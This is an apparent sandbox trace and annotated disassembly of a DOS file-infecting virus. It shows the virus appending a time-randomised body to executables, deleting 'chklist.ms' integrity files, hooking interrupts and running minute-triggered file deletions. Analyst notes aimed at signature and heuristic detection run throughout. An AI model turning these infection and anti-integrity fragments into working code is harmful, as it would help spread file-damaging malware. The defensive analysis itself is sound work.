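2018-12-25T12:23:32.559155123Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device') [63 = vector 0x3F; the AKA text is again an INT 21h function name]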
2018-12-25T12:23:32.561578489Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:32.739678853Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:32.741881937Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.742996642Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.744056239Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.746427464Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.747939186Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.74939405Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.751880092Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.753311889Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.754697448Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.757030747Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.758382859Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.759709047Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.762033721Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.763372461Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.764669434Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.7672579Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.768327134Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.769338621Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.770888936Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.771923362Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.773491058Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.775958256Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.778086459Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.779573827Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.781601974Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.783055744Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.784387109Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.786193287Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.788094698Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.789982987Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.792003329Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.793408887Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.795100946Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.797139577Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.798484291Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.799975592Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.801899438Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.803452611Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.805182265Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.807116046Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.808643323Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.81072033Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.812723437Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.814140713Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.81642704Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.81814423Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.819867387Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.822599928Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.824055775Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.825460619Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.827569599Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.829004491Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.83100181Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":40,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:30.202533738Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:30.204090683Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:30.206887652Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:30.207916009Z 78 PC: 15408 | Find first file
2018-12-25T12:23:30.214477662Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:30.220091629Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:31.238852594Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:31.254943095Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:31.256162551Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:31.262487455Z 66 PC: 154a6 | Move file pointer
; Capture at PC 1550b, the instruction after an INT 21h AH=2Ch (Get time)
; call. On return DH=seconds and DL=hundredths, so DX serves as a source of
; bits that change from run to run.
; Loop 1 fills 8 bytes starting at bp+0x556 with 0xF8 or 0xFC (the one-byte
; opcodes CLC / CLD); loop 2 continues with 0x90 or 0xF5 (NOP / CMC).
; Defender note: this filler differs per infection, so it is poor signature
; material; match on the stable body instead.
2018-12-25T12:23:31.265684893Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8  ; 8 iterations
0x1550e: lea di, word ptr [bp + 0x555]  ; DI is incremented before each store, so the first byte lands at bp+0x556
0x15512: inc di
0x15513: shl dx, 1  ; shift the next time bit into CF
0x15515: jb 0x1551e  ; CF=1 -> store 0xFC, CF=0 -> store 0xF8
0x15517: mov word ptr [di], 0xf8  ; word store: also zeroes [di+1], which the next pass overwrites
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c  ; Get time again: fresh DX for the second loop
0x15526: int 0x21
0x15528: mov cx, 8  ; second loop, DI carries on from the first
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537  ; CF=1 -> store 0xF5, CF=0 -> store 0x90
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5  ; capture window ends here, before the loop instruction at 0x1553b
; Capture at PC 15528 (after the second Get time call). The second filler
; loop stores 0x90 or 0xF5 (NOP / CMC opcodes) per time bit, then a third
; Get time picks how many filler bytes (0-15) are written to the open file.
; The trace row after these captures logs "Write 6 bytes on handle 5" at PC 15550.
2018-12-25T12:23:31.271451443Z 44 PC: 15528 | Get time 0x15528: mov cx, 8  ; 8 iterations
0x1552b: inc di
0x1552c: shl dx, 1  ; next time bit -> CF
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c  ; Get time: DL = hundredths
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf  ; CX = DL & 0x0F -> byte count 0..15
0x15548: mov ah, 0x40  ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
0x1554a: lea dx, word ptr [bp + 0x556]  ; start of the filler buffer; BX is not set in this window (presumably the handle from the earlier Open)
0x1554e: int 0x21
0x15550: jmp 0x15555  ; jumps over 0x15552-0x15554
0x15552: nop
0x15553: add byte ptr [bx + si], al  ; bytes 00 00 that the jmp skips; probably data rather than code
; Capture at PC 15541. Writes 0-15 filler bytes, then stores a time-derived
; word inside the body and writes 0x4b7 (1207) bytes starting at bp+0x10.
; 1207 matches the size in the sample's name and the trace row
; "Write 1207 bytes on handle 5".
2018-12-25T12:23:31.276242951Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf  ; CX = DL & 0x0F -> 0..15 filler bytes
0x15548: mov ah, 0x40  ; INT 21h AH=40h write
0x1554a: lea dx, word ptr [bp + 0x556]  ; filler buffer
0x1554e: int 0x21
0x15550: jmp 0x15555  ; skips 0x15552-0x15554
0x15552: nop
0x15553: add byte ptr [bx + si], al  ; bytes 00 00 skipped by the jmp; probably data
0x15555: mov ah, 0x2c  ; Get time: DH=seconds, DL=hundredths
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx  ; time word stored at bp+0x30, inside the bp+0x10..bp+0x4c6 range written below; presumably a per-infection key or seed (TODO confirm)
0x1555e: call 0x2514a  ; NOTE(review): target is far outside the 0x14fxx-0x15exx PCs in this trace; the disassembler may not have wrapped the 16-bit displacement, verify the real target
0x15561: mov ah, 0x40  ; INT 21h AH=40h write
0x15563: mov cx, 0x4b7  ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c  ; Get time again; feeds the tail length computed past this window
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:31.279418048Z 64 PC: 15550 | Write file or device (Write 6 bytes on handle 5)
; Capture at PC 15559. Writes the 1207-byte body, then a tail of 0-63 bytes,
; then seeks to end of file. With the 0-15 filler bytes written at 0x1554e
; (previous trace rows), the growth of an infected file is not constant:
; in this run the trace logs 6 + 1207 + 22 bytes.
; Defender note: size-delta heuristics need a range, not the fixed 1207.
2018-12-25T12:23:31.286777075Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx  ; time word stored inside the region written below
0x1555e: call 0x2514a  ; called before the body write and again after the tail write; presumably an in-place transform of the body (TODO confirm, routine not in trace)
0x15561: mov ah, 0x40  ; INT 21h AH=40h write
0x15563: mov cx, 0x4b7  ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c  ; Get time: DX = seconds/hundredths
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f  ; CX = DL & 0x3F -> 0..63 tail bytes
0x15577: mov ah, 0x40  ; write; DX is not reloaded, so DS:DX is the time value used as an offset and the tail is whatever memory lies there
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202  ; INT 21h AH=42h AL=02: seek relative to end of file
0x15581: xor cx, cx
0x15583: xor dx, dx  ; offset 0 from EOF -> DX:AX returns the new file length
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9  ; presumably a shift by 9 (512-byte pages) for the EXE header size fields; rest is outside the window (TODO confirm)
2018-12-25T12:23:31.289569989Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
; Capture at PC 15570, between the two calls to 0x2514a.
; Compare with the capture at PC 15559 in this same run, where addresses
; 0x1557e-0x15585 decode as mov ax, 0x4202 / xor cx, cx / xor dx, dx / int 0x21.
; Here the same addresses decode as unrelated instructions, so the bytes in
; memory differ between the two captures.
; NOTE(review): that is consistent with the call at 0x1555e transforming
; (e.g. encrypting) part of the body in place before it is written, and the
; call at 0x1557b reversing it; inferred, the routine itself is not in the trace.
2018-12-25T12:23:31.298916812Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f  ; CX = DL & 0x3F -> 0..63 tail bytes (trace row: "Write 22 bytes on handle 5")
0x15577: mov ah, 0x40  ; INT 21h AH=40h write; DX still holds the Get time result
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: scasb al, byte ptr es:[di]  ; from here on: bytes as they stood in memory at capture time, not the instructions that run after the call returns
0x1557f: add byte ptr [si + 0x31], dl
0x15582: fbstp dword ptr [bx + di]
2018-12-25T12:23:31.302535303Z 64 PC: 1557b | Write file or device (Write 22 bytes on handle 5)
2018-12-25T12:23:31.305862129Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:31.307679723Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:31.30996303Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:31.313049298Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:31.319311764Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:31.325363221Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:31.327128525Z 62 PC: 155d0 | Close file
2018-12-25T12:23:31.335057888Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:31.346591098Z 79 PC: 1541f | Find next file
2018-12-25T12:23:31.349303351Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:31.353655099Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:31.356088676Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.357492302Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.36301696Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:31.368044629Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:31.374169987Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.375616714Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.386180495Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.392664906Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.046836731Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.054854329Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.056882929Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.063493099Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.065547401Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.068926292Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.071365661Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.073872766Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.08128472Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.083970321Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.09385303Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.097423609Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.100388503Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.101782186Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.104046703Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.107384372Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.117419177Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.123930417Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.125383207Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.132060034Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.142374315Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.146573465Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.152577875Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.163233617Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.170220859Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.171666649Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.177681874Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.180296912Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.182533731Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.185403368Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.187557508Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.1934173Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.196139967Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.496683946Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.499478842Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.504232306Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.505668691Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.506854713Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.509510726Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.513671218Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.517466179Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.519195378Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.524592962Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.531875785Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.534653622Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.538374372Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.544884293Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.550377334Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.551502372Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.556010719Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.558161767Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.560551005Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.562279106Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.564384143Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.568477783Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.570098857Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.576431673Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.577993298Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.580111477Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.581758085Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.582800673Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.584870503Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.589162005Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.593153176Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.594224609Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.599491977Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.605316048Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.607223013Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.6120251Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.618715396Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.622900496Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.624468817Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.6281383Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.62948109Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.631499264Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.63307135Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.63450785Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.639208581Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.640823056Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.646040172Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.648079925Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.650300298Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.651412877Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.65296593Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.654957956Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.658658421Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.663297331Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.66438845Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.668863276Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.675162167Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.677305065Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.681481271Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.688038416Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.69231319Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.693381754Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.697366999Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.698565666Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.700129149Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.702217635Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.703724208Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.707548243Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.709715132Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.714500963Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.726602044Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.729768678Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.731105207Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.732299086Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.735957315Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.742062215Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.74829115Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.749928574Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.756096958Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.764997061Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.767425705Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.771308674Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.775504566Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.777722612Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.781521763Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.783113616Z 59 PC: 15220 | Change current directory
; Capture taken at the instruction after INT 21h AH=2Ch (Get time), which
; returns CH=hour, CL=minute, DH=second, DL=hundredths. The code compares the
; minute in CL against five fixed values and calls a routine for each match;
; any other minute falls straight through to 0x15270.
; The trace rows that follow this capture show Find first file at PC 15337,
; then Get or set file attributes at 15345 and Delete file at 15349, all just
; past 0x15330, so one of the 0x15330 branches appears to have been taken in
; this run and ended in a file deletion. The name or mask is whatever DX
; pointed to (bp+0x290 or bp+0x2c7); the trace does not print it.
2018-12-25T12:23:32.787755764Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5  ; minute == 5 ?
0x1523f: jne 0x15244
0x15241: call 0x1534a  ; minute-5 action; routine body is not in this listing
0x15244: cmp cl, 0xd  ; minute == 13 ?
0x15247: jne 0x1524c
0x15249: call 0x15359  ; minute-13 action; routine body is not in this listing
0x1524c: cmp cl, 0x1e  ; minute == 30 ?
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]  ; DX = address of data at bp+0x290, passed to 0x15330
0x15255: call 0x15330
0x15258: cmp cl, 0x28  ; minute == 40 ? (same argument as the minute-30 case)
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32  ; minute == 50 ? (different argument: bp+0x2c7)
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]  ; common continuation; what SI/DI are used for lies past the capture window
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:32.789835431Z 78 PC: 15337 | Find first file
2018-12-25T12:23:32.795680257Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.806037246Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.841627083Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.8426722Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.844153016Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.845311509Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.846519717Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.848224435Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.849386003Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.850384499Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.851864769Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.852799663Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.853700222Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.855154411Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.856347626Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.857240629Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.858815491Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.859701051Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.86054653Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.86199774Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.862918655Z 53 PC: 14fba | Get interrupt vector (See above)
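2018-12-25T12:23:32.863808897Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate') [the AKA text is the INT 21h function name for that number, not a vector name; vector 0x00 is the CPU divide-error vector]
2018-12-25T12:23:32.865123258Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records') [35 = vector 0x23, the DOS Ctrl-Break handler]
2018-12-25T12:23:32.865949459Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [36 = vector 0x24, the DOS critical-error handler]
2018-12-25T12:23:32.866756739Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device') [63 = vector 0x3F; the AKA text is again an INT 21h function name]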
2018-12-25T12:23:32.868442405Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:32.990635829Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:32.992513302Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.994868052Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.996209728Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.997613511Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.999762868Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.000904067Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.002006682Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.003926194Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.005003376Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.006138299Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.00811215Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.00915693Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.010190494Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.01231423Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.01343326Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.014538989Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.016360217Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.017411323Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.01844265Z 37 PC: 15111 | Set interrupt vector (See above)
